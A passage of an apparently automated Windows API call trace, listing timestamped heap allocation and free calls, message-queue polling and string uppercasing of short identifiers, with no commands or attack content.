lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.434] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.434] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.434] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.434] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.435] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.435] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.435] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.436] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.436] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.438] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.438] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.438] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0196.438] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0196.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0196.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0196.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.441] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.442] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.444] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0196.445] RtlAllocateHeap 